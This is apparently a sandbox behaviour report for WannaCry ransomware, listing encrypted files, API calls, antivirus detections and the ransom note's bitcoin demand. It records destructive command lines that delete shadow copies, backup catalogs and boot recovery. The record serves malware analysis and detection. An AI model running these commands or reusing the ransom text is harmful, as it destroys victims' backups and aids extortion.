file C:\Python27\tcl\tix8.4.3\bitmaps\plus.gif.WNCRY
file C:\Python27\Lib\test\test_doctest2.txt.WNCRY
file C:\Python27\Lib\test\cjkencodings\big5hkscs-utf8.txt.WNCRY
file C:\Sandbox\test22\DefaultBox\drive\C\Windows\system32\CatRoot2\dberr.txt.WNCRYT
file C:\Python27\tcl\tcl8.5\msgs\en_nz.msg.WNCRY
file C:\Users\test22\Documents\NMsibqicnH.txt.WNCRY
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRY
file C:\Users\test22\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT
file C:\Python27\Lib\test\ssl_cert.pem.WNCRYT
file C:\Users\test22\AppData\Local\Temp\217.WNCRYT
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Cookies\IXM980FM.txt.WNCRYT
file C:\Users\test22\AppData\Roaming\tor\key-pinning-entries
file C:\Users\test22\AppData\Roaming\tor\state
file C:\Users\test22\AppData\Roaming\tor\unverified-microdesc-consensus
file C:\Users\test22\AppData\Local\Temp\474.WNCRYT
file C:\Users\test22\AppData\Local\Temp\403.WNCRYT
file C:\Users\test22\AppData\Local\Temp\640.WNCRYT
file C:\Users\test22\AppData\Local\Temp\713.WNCRYT
file C:\Users\test22\AppData\Local\Temp\446.WNCRYT
file C:\Users\test22\AppData\Local\Temp\574.WNCRYT
file C:\Users\test22\AppData\Local\Temp\434.WNCRYT
file C:\Users\test22\AppData\Local\Temp\641.WNCRYT
file C:\Users\test22\AppData\Local\Temp\657.WNCRYT
file C:\Users\test22\AppData\Local\Temp\630.WNCRYT
file C:\Users\test22\AppData\Local\Temp\621.WNCRYT
file C:\Users\test22\AppData\Local\Temp\762.WNCRYT
file C:\Users\test22\AppData\Local\Temp\331.WNCRYT
file C:\Users\test22\AppData\Local\Temp\448.WNCRYT
file C:\Users\test22\AppData\Local\Temp\513.WNCRYT
file C:\Users\test22\AppData\Local\Temp\682.WNCRYT
file C:\Users\test22\AppData\Local\Temp\729.WNCRYT
file C:\Users\test22\AppData\Local\Temp\528.WNCRYT
file C:\Users\test22\AppData\Local\Temp\538.WNCRYT
file C:\Users\test22\AppData\Local\Temp\688.WNCRYT
file C:\Users\test22\AppData\Local\Temp\342.WNCRYT
file C:\Users\test22\AppData\Local\Temp\712.WNCRYT
file C:\Users\test22\AppData\Local\Temp\495.WNCRYT
file C:\Users\test22\AppData\Local\Temp\732.WNCRYT
file C:\Users\test22\AppData\Local\Temp\520.WNCRYT
file C:\Users\test22\AppData\Local\Temp\615.WNCRYT
file C:\Users\test22\AppData\Local\Temp\691.WNCRYT
file C:\Users\test22\AppData\Local\Temp\726.WNCRYT
file C:\Users\test22\AppData\Local\Temp\418.WNCRYT
file C:\Users\test22\AppData\Local\Temp\562.WNCRYT
file C:\Users\test22\AppData\Local\Temp\752.WNCRYT
file C:\Users\test22\AppData\Local\Temp\419.WNCRYT
file C:\Users\test22\AppData\Local\Temp\590.WNCRYT
file C:\Users\test22\AppData\Local\Temp\607.WNCRYT
file C:\Users\test22\AppData\Local\Temp\595.WNCRYT
file C:\Users\test22\AppData\Local\Temp\567.WNCRYT
file C:\Users\test22\AppData\Local\Temp\346.WNCRYT
file C:\Users\test22\AppData\Local\Temp\696.WNCRYT
file C:\Users\test22\AppData\Local\Temp\532.WNCRYT
file C:\Users\test22\AppData\Local\Temp\680.WNCRYT
file C:\Users\test22\AppData\Local\Temp\483.WNCRYT
file C:\Users\test22\AppData\Local\Temp\501.WNCRYT
file C:\Users\test22\AppData\Local\Temp\601.WNCRYT
file C:\Users\test22\AppData\Local\Temp\742.WNCRYT
file C:\Users\test22\AppData\Local\Temp\426.WNCRYT
file C:\Users\test22\AppData\Local\Temp\543.WNCRYT
file C:\Users\test22\AppData\Local\Temp\521.WNCRYT
Time & API Arguments Status Return Repeated

NtWriteFile

 buffer: Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
offset: 0
file_handle: 0x0000011c
filepath: C:\Users\test22\AppData\Local\Temp\@Please_Read_Me@.txt
1 0 0
cmdline wmic shadowcopy delete
cmdline vssadmin delete shadows /all /quiet
Process injection Process 2192 resumed a thread in remote process 2264
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2264
1 0 0
cmdline icacls . /grant Everyone:F /T /C /Q
cmdline vssadmin delete shadows /all /quiet
cmdline cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
file C:\Users\test22\AppData\Roaming\tor\cached-certs
file C:\Users\test22\AppData\Roaming\tor\cached-consensus
file C:\Users\test22\AppData\Roaming\tor\cached-descriptors
file C:\Users\test22\AppData\Roaming\tor\geoip
file C:\Users\test22\AppData\Roaming\tor\state
file c:\users\public\pictures\sample pictures\desert.jpg.wncry
file c:\python27\tcl\tcl8.5\msgs\kw_gb.msg.wncry
file c:\python27\click\click\click_image\exec.png.wncry
file c:\python27\tcl\tcl8.5\msgs\eo.msg.wncry
file c:\python27\lib\test\keycert.passwd.pem.wncry
file C:\Users\test22\AppData\Local\Temp\1.WNCRYT
file c:\python27\include\asdl.h.wncry
file c:\python27\click\click\click_image\open.png.wncry
file c:\python27\tcl\tcl8.5\msgs\zh_cn.msg.wncry
file c:\python27\include\ast.h.wncry
file c:\python27\lib\site-packages\setuptools-41.2.0.dist-info\top_level.txt.wncry
file c:\python27\tools\pynche\x\rgb.txt.wncry
file c:\users\test22\appdata\local\google\chrome\user data\default\extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_16.png.wncry
file c:\users\test22\appdata\local\microsoft\windows mail\stationery\roses.jpg.wncry
file c:\python27\tcl\tk8.5\images\pwrdlogo100.gif.wncry
file c:\python27\tcl\tk8.5\msgs\de.msg.wncry
file c:\python27\tcl\tcl8.5\msgs\bn_in.msg.wncry
file c:\python27\tcl\tcl8.5\msgs\th.msg.wncry
file c:\python27\tcl\tcl8.5\msgs\sh.msg.wncry
file c:\python27\lib\test\cjkencodings\big5-utf8.txt.wncry
file c:\users\test22\appdata\local\google\chrome\user data\default\extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_128.png.wncry
file C:\Users\test22\AppData\Local\Temp\437.WNCRYT
file c:\users\test22\appdata\local\microsoft\windows\explorer\thumbcache_sr.db.wncry
file c:\users\test22\documents\readme.bmp.wncry
file c:\python27\lib\idlelib\help.txt.wncry
file c:\users\test22\appdata\local\microsoft\windows\explorer\thumbcache_idx.db.wncry
file c:\users\public\pictures\sample pictures\tulips.jpg.wncry
file c:\python27\tcl\tcl8.5\msgs\es_py.msg.wncry
file c:\python27\tcl\tcl8.5\msgs\nn.msg.wncry
file c:\python27\include\unicodeobject.h.wncry
file C:\Users\test22\AppData\Local\Temp\14.WNCRYT
file c:\python27\include\cstringio.h.wncry
file c:\python27\lib\test\tokenize_tests.txt.wncry
file C:\Users\test22\AppData\Local\Temp\31.WNCRYT
file c:\python27\tcl\tcl8.5\msgs\fr_be.msg.wncry
file c:\python27\lib\email\test\data\msg_34.txt.wncry
file c:\users\test22\documents\readme.hwp.wncry
file c:\users\test22\documents\fsrtltbncjg.docx.wncry
file c:\sandbox\test22\defaultbox\user\all\microsoft\windows\caches\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db.wncry
file c:\python27\tcl\tcl8.5\msgs\sq.msg.wncry
file c:\python27\tcl\tcl8.5\msgs\es.msg.wncry
file c:\python27\tcl\tix8.4.3\bitmaps\openfold.gif.wncry
file c:\python27\lib\site-packages\pyautogui-0.9.50-py2.7.egg-info\sources.txt.wncry
file c:\users\test22\appdata\local\google\chrome\user data\default\extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\icon_16.png.wncry
file c:\python27\lib\email\test\data\msg_46.txt.wncry
file c:\python27\lib\test\badcert.pem.wncry
file c:\python27\include\python.h.wncry
file c:\python27\include\python-ast.h.wncry
file c:\python27\lib\test\cjkencodings\shift_jisx0213.txt.wncry
file c:\python27\tcl\tcl8.5\msgs\ca.msg.wncry
Bkav W32.WannaCrypLTQ.Trojan
Lionic Trojan.Win32.Wanna.toNn
tehtris Generic.Malware
DrWeb Trojan.Encoder.11432
MicroWorld-eScan Trojan.Ransom.WannaCryptor.A
FireEye Generic.mg.84c82835a5d21bbc
CAT-QuickHeal Ransom.WannaCrypt.A4
ALYac Trojan.Ransom.WannaCryptor
Cylance unsafe
Zillya Trojan.WannaCry.Win32.2
Sangfor Ransom.Win32.Wannacrypt_0.se2
K7AntiVirus Trojan ( 0050d7171 )
Alibaba Ransom:Win32/WannaCry.ali1020010
K7GW Trojan ( 0050d7171 )
Cybereason malicious.5a5d21
BitDefenderTheta Gen:NN.ZexaF.36250.wt0@aGEmS3di
VirIT Trojan.Win32.WannaCry.B
Cyren W32/Trojan.ZTSA-8671
Symantec Ransom.Wannacry
Elastic malicious (high confidence)
ESET-NOD32 Win32/Filecoder.WannaCryptor.D
Cynet Malicious (score: 100)
APEX Malicious
ClamAV Win.Ransomware.Wannacryptor-9940180-0
Kaspersky Trojan-Ransom.Win32.Wanna.zbu
BitDefender Trojan.Ransom.WannaCryptor.A
NANO-Antivirus Trojan.Win32.Ransom.eoptnj
Avast Win32:WanaCry-A [Trj]
Tencent Trojan-Ransom.Win32.WannaCry.kd
TACHYON Ransom/W32.WannaCry.Zen
Sophos Troj/Ransom-EMG
F-Secure Trojan.TR/Ransom.JB
Baidu Win32.Trojan.WannaCry.c
VIPRE Trojan.Ransom.WannaCryptor.A
TrendMicro Ransom_WANA.A
McAfee-GW-Edition BehavesLike.Win32.RansomWannaCry.wc
Trapmine malicious.high.ml.score
Emsisoft Trojan.Ransom.WannaCryptor.A (B)
Ikarus Trojan-Ransom.WannaCry
Jiangmin Trojan.Wanna.eo
Webroot W32.Ransom.Wannacry
Avira TR/Ransom.JB
Antiy-AVL Trojan[Ransom]/Win32.Scatter
Microsoft Ransom:Win32/WannaCrypt
Gridinsoft Malware.Win32.Gen.bot!se54409
Xcitium TrojWare.Win32.Ransom.WannaCrypt.B@719b9h
Arcabit Trojan.Ransom.WannaCryptor.A
ViRobot Trojan.Win32.S.WannaCry.3514368.N
ZoneAlarm Trojan-Ransom.Win32.Wanna.zbu
GData Win32.Trojan-Ransom.WannaCry.A
Time & API Arguments Status Return Repeated

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Desktop\readme.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Desktop\readme.txt.WNCRYT
newfilepath: C:\Users\test22\Desktop\readme.txt.WNCRY
oldfilepath: C:\Users\test22\Desktop\readme.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRYT
newfilepath: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRY
oldfilepath: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRYT
newfilepath: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRY
oldfilepath: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRYT
newfilepath: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRY
oldfilepath: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRYT
newfilepath: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRY
oldfilepath: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRYT
newfilepath: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRY
oldfilepath: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\readme.bmp.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.bmp.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.bmp.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.bmp.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\readme.c.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.c.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.c.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.c.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\readme.cpp.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.cpp.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.cpp.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.cpp.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\readme.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.doc.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\readme.hwp.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.hwp.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.hwp.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.hwp.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\readme.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\readme.xls.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.xls.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.xls.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.xls.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\log.txt.WNCRY
flags: 2
oldfilepath_r: C:\log.txt.WNCRYT
newfilepath: C:\log.txt.WNCRY
oldfilepath: C:\log.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\LICENSE.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\LICENSE.txt.WNCRYT
newfilepath: C:\Python27\LICENSE.txt.WNCRY
oldfilepath: C:\Python27\LICENSE.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\NEWS.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\NEWS.txt.WNCRYT
newfilepath: C:\Python27\NEWS.txt.WNCRY
oldfilepath: C:\Python27\NEWS.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\README.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\README.txt.WNCRYT
newfilepath: C:\Python27\README.txt.WNCRY
oldfilepath: C:\Python27\README.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\Lib\email\test\data\msg_02.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_02.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_02.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_02.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\Lib\email\test\data\msg_06.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_06.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_06.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_06.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\Lib\email\test\data\msg_07.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_07.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_07.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_07.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\Lib\email\test\data\msg_13.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_13.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_13.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_13.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\Lib\email\test\data\msg_15.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_15.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_15.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_15.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\Lib\email\test\data\msg_16.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_16.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_16.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_16.txt.WNCRYT
1 1 0
Time & API Arguments Status Return Repeated

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Desktop\readme.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Desktop\readme.txt.WNCRYT
newfilepath: C:\Users\test22\Desktop\readme.txt.WNCRY
oldfilepath: C:\Users\test22\Desktop\readme.txt.WNCRYT
1 1 0

MoveFileWithProgressW

